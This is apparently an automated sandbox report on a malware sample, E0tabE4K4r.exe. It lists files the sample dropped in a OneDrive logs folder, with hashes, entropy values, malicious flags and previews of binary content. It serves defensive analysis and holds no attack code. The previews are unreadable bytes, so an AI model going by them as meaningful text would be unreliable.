                                                                                                                                                  Preview:EBFGOr>.v_M.K.H....,*6e..~hl.6b/...r...t..}u.....u........mo.....RI....3R....mG.l.BZ0H....9..7..q^T....Y...?.....P......<..49b..,..<Jn........m....[qn..M.Ts.-..~.r.../&.;....G..!``...\$...G.-5...*..iR.]....m7..q.>..o.(.^....=*... =.....A0.?Ln.XGO..s.]..+...I[...D7.g>.....I....`Sc.#.+..y.a.=.?...aSu......Q}HM...R........`....]2...Z.,@.A..E.Z&..q}pH.(....N.yc.mb.w.....;..Zpy....&.|.w..i/.=..Ww-....{D..._..8.8..C*..y/$......'z...kxc.}...s]C.......+.......K/g5_..&rP.........k...J..........oG.f.ph.h.Vg.S..g.B....9. P$..P."....h.#...!Z..........C.{u.........]z..bw.^..mN...t.iw...u.r.C...}.C.}.I.A..>...J..X.-.....2...AlOH...A....=...z......Q....'.B.G3../.k=..G.../l.}.;8....E.D....@.yx..f.DE...D...LHq..C...@.~.......e...sfD<...+|...J..Q....:.*j.QB.X....lG.V.Pv...!..H.....f.x._.Ej..c.v.....w....2...7L..Rp...v.yy4.T-0...E..S...>.....9.O4 |..b .nu"..;.*.J........9E.Y#".j....5M....A.E..mC...2....X.b..XZ.Mm-.;?..S.x.bs.w!.=+.T..p..S......p.....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-05.1057.9608.1.aodl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):1.2795212410060264
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:EA7mwvfJfHtBrkbstl8JOPs+cBbyQP2mogpnSrHnTLQWpqL:L7mafJftBrCCl8JOU+OyrXrHnTmL
                                                                                                                                                  MD5:AE6743D3DA4E91B55D11CE985D13BBA1
                                                                                                                                                  SHA1:A4350E50DC6592E74B9D56775A16B9154CDF266B
                                                                                                                                                  SHA-256:8B42CEEE2BE92AE0DC3A8B60156785B778D16A2DAA5C68E537E664A56739D917
                                                                                                                                                  SHA-512:C1AE0BFB65297189A5FB5E030C1F17D0F984E11BB60BA2A533A248B2AC773E97C5B4695F8DCD7CC1ACEE6E8E3921998B2B630D1DDF16746F3540E951FBDD36B0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:EBFGO&h.F..ua.,vY7.).S..tf.]..%f....=+.m....^X.L.f.Fs..J.....FK.\.T.C..,..oJ.....uF...8..........wX.+\.r...A...Y.=.k1mw.;...<......r.Or..w..4....'K....;..T]..q.....g..2.....?.K.3..p..l.c.A.u.....r.5....9!.@..s1...k...Qr7...=u..zI_!.].dQ..@*eS\.e...6.o.'*3./....>.....p..}W.6WnE..I5....L..W.S....:2..:+Uq..w<.<.v..K...\AB.|c.....g.._<;.;...0.0.s.....U.uv/..8O..j...D.A.y...m....h2..6..{...'......M^^..j...=..[.1P....P.....!9.x..O.%....~U.}[L<`...Z....Sd.G..:..(S2.M..o3..9J.v*.3IO.....f..N..7.....#.1........m..sRM.Gss.M[l.........P...J.0D.=...N..j....Eu.AY.b&....C&....?;.Uf./a.j....].. ...mc.q^...!..k-.x.?...c!BW,i.o...:...5r..h.D.V...egX..4 .....zr.n.....5...f-a..6B.);$p....4.U\.S|..%.u.......7.8..i$......O.3>oc..<A.N..<.e... ....`.../F..M_.2N.\...8....q..s...(X....a7..u8.Q6f...{r..1Z..B..H.$fqH.C.....?"....%*7j.c..eR.m.....=.7..D...F....W.0S.*&'Q.a.>+..u.7...d.m.=.~........R.....E..w"...Y....,...g..\_0..p..i..h..{O......E7ss.s.....c.B..L...2.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-05.1057.9608.1.odl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):2.8974285397926125
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:lnp+HT2Vr3lpX9HpiKqjvCgdazQE8KaqHDK5vbR:l62Vr3lt9HUj6cE1a0D2
                                                                                                                                                  MD5:020C62F2ABE437D6BF4A6CF469ED298E
                                                                                                                                                  SHA1:EF199ACA90E2B8C3C2B153B8AB567503FBCECE75
                                                                                                                                                  SHA-256:F81D27D5CEA9966F4CAD6C2F310BD6F364E9485F435903572F5CFB4AB739E182
                                                                                                                                                  SHA-512:C7B9BDF5FA93865A0C378D57C15D2723327BD363E875E4F7743830612BE5F943ABA3727C3C8EB66D183FC4D067046C6428E5DC75C8FFADE60D89254FF5415A57
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:EBFGO9..:c.....k....&.<-.=0.mt%../..p.|..|..&D.D.r.DO..D..:}.T.."....8...6db....3.k........a..vEt.8.rl.h.=. ...|...OVg.E2Ryv....^../..B.h}..c...C.vm...km..&......M.L+..Q...4!.r......Wc..LW.^o,x.].......;9....oH.a..|j...d..2{.o9G.B.'.|.....A..(rm.Ud.qcp.......7.ob..g1.....o~..).....{&......}..[.W.$.?g..v.It]./b..,....5....P.r..9.xv..a..}.`.....].`.:suI^.....m\1....uma.S.>;i..c(...OT..~e1."..?......o...'...Y.l}...n.vw..Q6.9(.rU.p_.6.MD.\..;7+..A.G.5..!....*....+$...fD.5.P-+.^u?..2U\t....x.h.OjS...mB...&4.GLg.rMw...#....&.d.......mQ...._]+.5....K.j...~....O.z....lK...0.O..5..4...R...P:G.H...E.&.^Y.1H....F.......^..f...LL.D....,.'.....v.....H..7..?dh@.I#O....H..........:.H.E.......~....fG............j.... K.N..Z..;..=:...6.B-v.qU...6..4....c..e.X.?...".gt.@N.).s....yy.4.....w<...........k.DZq.3...b.a.f.H:.<..C.hp....0.....;..sK.....BM...i.....:E.c....d.EM?..iR.c+...F...qf..R...G.....U..@...L...K....tE:).~..........2.'.|...lh>Y..]m...=:.IY

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-05.1056.3292.1.aodl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):1.0105372784691118
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:sWCxvZ6RCA6MlrwQHYtr1CNT69uw6/djqrid/RaUBSEofbIay6mrPHw0:/gvMDut2TK6/hqri/xemrP
                                                                                                                                                  MD5:3BB62CAC71177E7AD35BAA8F175B97D1
                                                                                                                                                  SHA1:7828C9AA25366A2402EFFBD4FA1C351B1EBEBDEF
                                                                                                                                                  SHA-256:FD57CECAC2453E65F921152582CEB87442FF8C1FCADE395CC0DD3FCB12F5DE9D
                                                                                                                                                  SHA-512:50B37BDA87988F791B53356E5AFD514FF4759B92E772EFA7D44ACC27E4E5D2702DA9F694DC13F80C01546ED45A8CD870912131BCE03814AF1740C81A400DB215
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:EBFGO.........~.<w...B6..Q.W.x.Q..q.&t..E....Dr..i....VA.cJ*....T"E.(..+=*......m..@P...t.T.....aF.Y......<x..U..7Q.{E.hD.......z...r.....h..2..{.h.@@M.:.'..(..^.,].:...^.2...O.......U.u.|m..s...y!..`4..@Q...{*..3u..I..v1V.b..1.X.a......|..<..8..#.....4......&W..x..A../mK..RA...R=..o...........g,..e8r....e.6Z."....8>..t.s.$v..... .'..Q1...>.'e.....*G..D..o?7....n.....C.....7.....1.U.......mX.c .....N.."......A...T.l.I5.D.7..Y.....h3.....xX.._.....Zv.>...$"..D.f .y.G..I;.U.U`..O....>...D...c.##J.i....].D0....p.TJ...D.,`.h.g..C0._....O!...dS8.1....3...*...}..u......~...i.v.9!]..v..;Pr....!\...Dk2.F.m.m..L.x..?.J9.z.=F.......~.6.....SY.S.y.m.e}..i.A**.h..K..x.U.....<D`...io..?\....F.\..z.0.......t.P..fK.I....B..W.....1...<6.........W...d.....].N..+.@2M2...N..3]&.......W..Z.D..B......58..O.L@..I..........H..;.?^.M..W...~..........M.[T..J......S0.HdB%<.3.P.X).....-T..q....J+$...4V..e..! ..jQp..."[.. Sh$.a.F........q....o.GL.7T.{...f..4b`....7L{,......

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-05.1056.3292.1.odl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):0.20603314162871933
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:9hRdlofhhCtyN4faJLkREfMSssZlYMoTlspbAsgbcGQm+6xq1UyQsAM/dztS4qb7:1IfhhCAebklgONR/mqS88Q2bz
                                                                                                                                                  MD5:FFB3F74A904653770C1F946DEFBDA389
                                                                                                                                                  SHA1:B3EC11C171A7D4AE90C719A4241A033E17D91CF8
                                                                                                                                                  SHA-256:2B19667F9AA039F95676DB333E687D147AEB5A4B1E7C134850B09DF2C58B4936
                                                                                                                                                  SHA-512:9A05321C5416CF847DB2A9D45A844DFADB504F0E90C11643C0B18F0FCF0785EE1D79E76FA51E68D84C08A0E9A4475117DFE5810AC0D85DE364C436634A539DB0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:EBFGOX....7...o2....L............g..).x....._....fo%.8....Q.Y..pT.4....>x..~.M4.G...z.....p/.......M....6...r...H.+.....R....y.((.....B.y.9....r....V|....*....d.E.......Y..(ylqq.......Q]./..............|...P......I)........ub9./..c...y..<.4%..f..7.-...wDv...n{..,.7}..8Kq....*\;..J.3..$.h.......bI...!.P.\..A..X.N/...UC...,.!..}..=-.....pP+@.Z.DT.>.A..>.k..=.o=..eyGp.....;t+..".%.T.O.TDLg.8....\!...'.A7}....%...o..h2A.....f....A=...kJ.lL....-.$..w..Dit.I.J(0=..d..G..~@...t1P%...0+.h..5A..........wp.\...`F..k.r...(/m^....!...X...M.X.[...c....r.h......cvy.{..._f.{.p.... .7.f......!oIO. 3.s.;.....,.4..K.].M.3.n..L....+zyr..o..G.......6!..v.~.!...|.....i..j.s<#?RR.{..2.e...9..).X..|...w.1M..H.8....UK....?...{n.].......d...7....;,......C\{.,s.-.})m.....%X.._mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}........................................................................................................................

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-05.1057.9740.1.aodl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):4.6876906335027915
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:Ef1VWelblJCCm06anDiWvnVGGAVABRtR5WRTzIE0jzW4dGK09bX:IDbJ474i8VzAMRJWRY/Hwf
                                                                                                                                                  MD5:ADF2A6092CA1CB4B9D4F541F8FF8EBE4
                                                                                                                                                  SHA1:DDB3BF0D85AC2CB8C8B4C468F300F7C98C9B2044
                                                                                                                                                  SHA-256:03682BA2A7F85C82A81BE1C7C395874903E32B1964FB2169EADFC4EE3B9A4882
                                                                                                                                                  SHA-512:F7C05FD0B780DE65879C73AFDBCF7B23C34CED7CE47F513DD9877FC26F8A3CAC0DD2091726399FBAA4A2E3985173DC89FB7E0775EF7972EEA8D3AB2BCF312537
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:EBFGO.ZLV.i.....,OXh$z;.F..G..%.3?1.8t....D5..0U.f2y.Tk..rg.t..B>...N...v..R....G..j.2...F;/.R.*..!,.qx5...w7..........H....0...\.b.B......C...UT....?..1!8=...`..??..k...rk....@.J..8.j.]Z...RPr...@..m.a(.&F.V......)6...N.Z.*).N.6S.e._.7H.!....o.....P&8..3.......Ckk...3.k_8.s..M..Xx....Y..?xN.)..2.....q=....Bd..v).....fn...P.!..N..u..U.iQJ..X.........pf@f..C5.Q..&$.n.\.S...ve..`y7.x..=t..Y..N.3....'i.H.r..u..D._...ph.g....;...2{Wr.R2.......v....d...j..fv...k....=...y.~.2...[.,.Z...{.n..P....#....tf.5....p.Q.j........s.g@...jP-..L....|..FV.j>o..7UZ......kxXF....-..;BO{........3.V...zW.,......u>..w..|..3.;..%.r....`L_>...?A..B.Vk..8Q.....c..5.....\..QJ..#yR?qK.OXH.aC.,lB.n>..wW#.@8..:4(^...p.2j..7.......3....zP..D..f.).|...<...K..I.=%..{..E..,.+&..)'.%..?.kz=....$<k..*....[=.".E........8.:..+js..&.`.".e......3el.m....x..}.h.}v..~f..%...<s.b..9._H^..t-]Ab....?..S.1.=.p........Kj>.W...%.-..(.9....`o)..N]v+R...q..r..4..tAgG.?.N...L...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-05.1057.9740.1.odl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):0.3067907070413238
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:iMU9BDfUudooBLH2Dosr7QV3nBQHlg/z:LOUiV20sgXB+Y
                                                                                                                                                  MD5:472EA1C0FD4C7D7957FE6EEFD956F6E5
                                                                                                                                                  SHA1:FA7BB736D6DF0A5977BEFEC5F8778FA46795275D
                                                                                                                                                  SHA-256:08B30686F258DB68F3CFBBA1C1B25A50B00AA46A5E44CA8F29910DD311B09F63
                                                                                                                                                  SHA-512:3CCAAF4C653E6E1B98AF3099E2A38170521ABF27C0B7AE7EC928D58091261763FD85D1F4DB35B7980A384309F18D809EA9F1EA7E95D854B9410F3EED5A0A66FE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:EBFGO........T...`..M......).2N..].5.k../...F....[1..V/.U.....eD....D...MA........{.7..#2q..Q._gf....H.u...s8.....V.?........f....*{.....g..i..&...qr...L.VH.2.I38.8>1.c6>.n..H..3-r._..Cs..Q.j....J.Gq..;....W.....o.....T"Fa..Y.u....b^3.5Q%X`.*Ir....W8..Bnm...'1./....A.<N:...q.5.\..v..[.......+.)%.5.k.B)]...4.....>*B....2P........1.e....l;..Tx\.j.....M.B...:..."..j..h%...[.....R~".H.Q..J..PR..K...cf.....{~..k.L.W..A......%..k.b,4...me..?..A7.h.;.<..dg...wB.>..1....p.#./Zn...Q...O.b;SR.D.+....T...mj.g..G.. .B...!|\...L..(.a..m......:.@.>.O=a.wO.a+dJr4.;.7C....@. :...Z.8..u].yZ.s.g......`.U../..V,.X.R..S..[@....T....j.BBL..l..H...dRW@....-S....S]p+..........0`(...4.~).A.:...s/...7p`K..3K.6.....Qz.{....L..,....A...5dA.n.;3]........&..xQ..(.v.b..q.k.B...S.......x..@.N..9R.... ..9N....o.Y..............Bp..{..g2%u5=<...0/H.....o.1.3......D...o.$..D....jC..4/-....3\.A..I?R7....v.?.`-.O.....U.*.v.}5|.u.E[..9.N.J.Z....R.n9@1.`..8..`.....i...Z.....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-05_105648_cdc-e10.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):131072
                                                                                                                                                  Entropy (8bit):7.940266299177147
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:wopzyW9FlcCgr0qk0YaKFGEMf0a54UNdoVDOi:vpp7lcCgr0q4Wv54UNdoV5
                                                                                                                                                  MD5:1ED31654F15CA2297CCEC68425539C35
                                                                                                                                                  SHA1:3FC756BB11088E6F70A47705D68EFA966388CA0D
                                                                                                                                                  SHA-256:FB8AAC970CEB152E1390844B50A4BC00BD1BFBD7CAF8108D28C981961F0953CB
                                                                                                                                                  SHA-512:444757E070A62AE250C186E8A863303E0D20ABCB9A94EB0C27A253CDB489E21AB6F9F00F81BC5486C0732F6A4DB83AAB8CE9D60F134F2C4DB5598129B2E458DF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1.0./!.....J.a...........>/Ns.....y...ix..p...JCM.LrF..i1 .g.....#.>;../=}..K..I..7..^E.{........ga39;={..=...79..s.4.0.N..........D.@-.7=..|.U.......d"..])...u.m...M@.T..*.D.U8..|r;Y."8..%d?p.3%7...MEX.......=.C......R...Q....;.OW:,.)..:.....|z.......t....[....b.hM.....z.V)O;."...[L..........q...*..A.m.V.ut..'.D{&.fF<....>4.Ba|..2....2...j..!......... 8u.J....}..ga~!...[.......C.k...b.9......{...&U.6."...Ejk.G}...}...TH...U$S..5.S...*.n..b..O......>#e..GH..cC.1....=.o2.|T...o......./.........5.gN.v.b..a..h..!#...M.X......0aF...!..+Q.....j.v.V.."..7..^.e...".#..*QS.[q.Kl....%........X.w....t.].J.x.m+.y.o...p"..s.I...f..N l...FG(.J.>..E..._V.....at.....+-.o/;$[.0..@... ..I....aV....R.w....L6FC.KM..Yt.<......BH....j.*.....q........(.C.4B%...........u.z*.A..F).Q...}.,.fY.y.P".......i'..<81-eQ...N..V...C4....%.....r......>&3.X^.....s{.q.x..u....3\.UCf)...6=.R.....`.@.%.D$I.X..u.K..z.v..CGN...[....<P..3...Y.p...f..x....bh......-~...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-05_105717_9740-9744.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):262144
                                                                                                                                                  Entropy (8bit):6.806954187931597
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:p+p5uevpfr+qXL9ZpHOhOIC99E6mRnMu+fFUdXqmzHgA:p+OevFqfhOn06w2
                                                                                                                                                  MD5:5C019BD02B22CD9CB464D16B15F003A9
                                                                                                                                                  SHA1:8DE2E7A29A4EB704B127DAA6EEE3D2C23E60112C
                                                                                                                                                  SHA-256:3A8650737E39FBA42212AF7EEF5FE19D4ADBA84CF42B09BF763C0C2B827FBA76
                                                                                                                                                  SHA-512:CDD4B7493B2DF265C208882343B30A8A8C44B36EAA41876D47BD9DFE9C0831CB75DCC542E3552E5E49348A2E74EA8A450EC63D9EDE2F2E212C4BCEBCD9C9B929
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1.0./..Qq.J.!...c...N.....BY%...&...>B\".......R'..@.A .w....pu....P.Y.N.D:..Y....;...V.....ubU.Watf..nV...?1..G..;.1k4n....x.R::Z."S..Eq1:{%.F6.}.3l<..N.rx@c......i.EI...h.....cc...6.?@i+.|e..c|..%...)U.4...4..3I...}.4.....y.fY...$b_....f)oa|....:<M..Qe.G...EEU.p..1VS...1O......"s..i..iNd.w...1..7..I.p._..J...o.........}%.I.8....jc.zfa..OGtl..p..P...m._..S.."0..".ym.aL.a....D...... ...%~..6-...".cSr.[.)..E..d..R.d...G.?GTw.2.K.]4i.D....2..:...7t..."..o.x.^V..B..0_$..'.gsRot..9Bn.!..q....7b..b@.C..>'..H.M.&...Dq..a.h}....W.?n.#..|....H.R.......Wl7]..E..sj"..l..S....}_.>.eU.F..y.V;..J.....L.!..Y{....c.A...<..]-....Q.sD{..FO#..X8~3h.....<...aJ.3.w...s/u..w.H..i.C_..?....C..-...z*K..R.`.kM0[...\;..e..=\z#`.]....o.O+._..`:....`R...\..!..v.c.Eg.\4....8:6..."%*.$.K.Q.[.._1uc...T^..Ef....0.*...u....l...U*....r...hyr...A.+2Q.....=...$@C...t..+.m.5m..u..#..w..z.W.45,...5...Z.FOc.k24..q .e....)...0.G......D/....z.%.(.2.*~......k...A.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-05_105641_23a4-23a8.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):30276
                                                                                                                                                  Entropy (8bit):7.994174678171761
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:0u2B7Ad/USknSdzOlSCh+3reHoj1TpWaoKd4FCU:0uAAdI0uSD375Tpvzd4AU
                                                                                                                                                  MD5:A48FB820837846E909DCD803CD931D18
                                                                                                                                                  SHA1:8B713ED68323B51E216EF8E8519FCA062CEEE199
                                                                                                                                                  SHA-256:A4D4534C0C13E9B6A2A5517AC2A7D607679C25271AEBB791128A71F7F1C5731C
                                                                                                                                                  SHA-512:3BAAD1FA67EA37D36295D82A7990D2B2CB27B28C484FF62A0476DACD0DB4369F69733F9C534AD90F1E37F4BE17F466249956A1EBDE953B46AAB202A06AB278DA
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:1.0./..\....:0$..s...Z.L.x...rK/L......2MW.o9..Mw...cgI...dr....@.^......Q...AI.I.r.:..:.~uE...Ih.^!...c.k....2.~....>../9..... .....z.....k........).].[WG.yS@&..J.'O...cL...;..=A..c.|.2t..s.]*(..A..5....p....T...).i.m...G.T. ~.K..W....SHc]..."..Rhm#.#.w...&..N.)U......#.._G..e..d.l..q.s.....0.W.....o5D#w..T<L.eb...2...D......L..\y%.E0.-.![.vh....I>..q.[Y.....`.... T...]F?.....(a.....H.:..sY..Ho..Zx.fZ.}...@.b......f..8.A;.A...O...........P[...{..$.zN.g....%Ir"..Z.u.A..&E...E..}..c...A...L......1..r...d.. :.k9<.wm.M../!a.n<..k.Gc_M.r.`....~...y.....lpa..>.e.E?...:... .p7U.....|.$a..W<..T..&.?.K........!`BU........K..*..3_..TfGD=.Z5.!.#S6......L.t.B...}..5.........E.R.......~..3..d+......qA.2_.)...5YD".7..m......v.%EUs..*<..l*.GGp$Jr.4........-.%4i...C..Z .M(.QY.D...._...;b..E.{..s.....%jg`..l..H_..+...\%.B.~|#.`.>......L...Vr..._.:...73.<p......2L.O.G..I...wg..S.3...T.e6..;..J..8(0..tH...v...wMa.C.M..|8..$....D...g.....=.u..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-05_105711_9608-9612.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):4.627850074133118
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:nFRO4GZJnZsppm+4mt+RLxb1pqCQfjrKWNmypt15L1t0WaA7sMSfJ9BLozipDuxq:FROXnGr4RZ5Yftp5L8lYst3BLos2i
                                                                                                                                                  MD5:70B96B1537BBB83E2C5DEF0538A3EFC4
                                                                                                                                                  SHA1:F4BCFD0BEC5F8060C21E5EB6964B9E67CE9F1CB7
                                                                                                                                                  SHA-256:6C589D0BC2D67A183D4FE8459BA7E95DAE02E47B2D0E117EB6085C5568219176
                                                                                                                                                  SHA-512:A8E55572647E4802EE2B07A44A080B09F14BCBF41C3E80744B2ED141B187CF13E16092B21D32EF3A650F7C032E58DB913F25F92EB01E746CA86ABB247B1D1B70
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1.0./.=1k?......M.9. U.Uk.-...x..g*.!5.+3P4.t.Q,e......5A.o.=...&iP..Hygh/D.o.w...)7@...j>z.]Wv.1........"%'e.D...%.~...0.#,.m.r..S&.. .=..$.C.h........Hj..w..e.q.....f.h@.].o.o....zP..E..*.%....:c......N........0.......Q......,3..=;.R-R.2Q3nO..@.G.h/.U. .^X'.`|I..=}.j....B.._..:......k.P....T.."wq}.M..w..(. D.0~s..Dj....YTu..3........A..pgjg....m.zl.N~..?....)...s$.M.F...T.y........U.?.F<.H.8.._......3.j..[_......>A.W..-....0..1..l.....%....=..y.?.....ht...+.e^.....X.dr.X.1.A,..?....o.w......t...........G~.e6f.z.....%..=.|.Pq.o}.^>g....3[....~..Y. k...:,..."..X..P.+..C.'..1.UW"......E.P....z...ceZ1..l....AJ..@.d......N*.....O..|.=..9..S~....|...Hz....:).Y4...d.b=.*A../..T,..1.j......-...*.<..m....d........ G.,..6Q.C.)..8>M......Wtf.}C..^dN...@.6.v>.8...T....+.^.........7.}.j.@.....*.=..(d>|...0..)F...........o.G%.O..._....G...YV...J...^..3{.]l.)....-....z..7.v.#..X.T..]........F'.%.:.u.~c.\...?.%....'j$....Y....:.cn..g.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-05_110619_6820-6684.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):0.6184343511855727
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:1/udlqkfLqMwjKnWZmmL5dVvoO5QoeMLw/7Vhl0ItCweRoRk8f2fw2Dxcmr2YbvO:1/TkzqDJIy5HATVTeRoRrufGmZ2
                                                                                                                                                  MD5:7B1ADA64EE1A3E1FDD1D3F38E70A7A08
                                                                                                                                                  SHA1:9E27746B0D968AEA94F4FC953B4A416F6EAD4A72
                                                                                                                                                  SHA-256:8638C3771594C8F1976686CDABD17D8A12E0EA6A83BFA2AB8C007FDC4D3FF554
                                                                                                                                                  SHA-512:E9D62A50727FECE081E2EB4356012ED558C28389341C5E1F522418F29294332E9BD073499C7481E1B430B465F1F4C9BAA1A602D28FB685B1CFE4DA99E5FC388D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1.0./.;.....C.......v....$..!.-.`Ii.Zl....g...g..@sTH.~}...&....w.....V..FR.x..q.... .fL.h-.+9q#Z......v._.R...hK=.1.%.t+Y..@...B.d.......>....a].._.`|...ir.|..n...U=.q=....|-....rh..FN...6Vq%oTB-$..........EZ.....'s>.;...2.e.Md.C.oq.S.~Gt..t.k..p..i...R.+......i!R.g..@.X..Lz.....<.....bEF..U+..%.AW..?.!.ST?.Y`...b=J.b.=....lb.I....jr.ET.o[.5..{l.w........+..s'5.Z.i.&.m..fZ.{.l.f.^...v.S..0....4r.x.%.[. /..7(..y...}....UI..N.....PN.';.....WHl.I.1..T.....G..1|&.Q..G$GS..Gi...].<.ulBn..j..`..39&1......0......i.+P-(P.3.`/..l...N..O....#..><..bi..=l`;3..g.'...H..{oF%.bn.q>......Q.H...b.V..{.Fr.H..:e..T.E...L.3d.;&.".D.=.....J.q;.......F..ZZ.tZ...f]/.t../.....Q9.....j...|U.O.....{....m.FfDv.....x...;._.9(..f..$4.@$..g*hb.M.J..{.5.....#r..].W......3..H.|..I.-.G..7.._.M..|s..o..<a..E;E.W.)=e}.S..D..1..6...ePu..R..b.Nm..tr......+.;$.]../rcw..m.P.E_.|,......j.^ ....#..l..(}.Q[Y...5@B..%2.i.R..0..=.@l..E...A.S..c.9...{qy...4..B..n..ffr.i

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-2023-10-05.1104.6292.1.aodl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):0.9651537355100094
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:w0DhpKsONiM9Keg1VKNI+osi57hW/dNEseTV1iV0SDBtKnCQ+ISZ4k7L4:w0KRNZ9KXfdJpseTiV0aBYr+77L
                                                                                                                                                  MD5:5E4162A5B6A33431F5DED097C45ACD65
                                                                                                                                                  SHA1:5D1D1DE1243E7A6FAAEA978D34C644FAB8838670
                                                                                                                                                  SHA-256:13B0FB18D9C520A8931469E3958FE3CBF52AD9580512892736D77168017FCA35
                                                                                                                                                  SHA-512:14C356E1C9E0478B0F1431FE9D06ED1F579CD0C87FC2191023492DFE769F78434221B6B791F2804A93F2759AC9C7F765C9D6156C551FFDE5DC3039B85AF41F51
                                                                                                                                                  Malicious:false
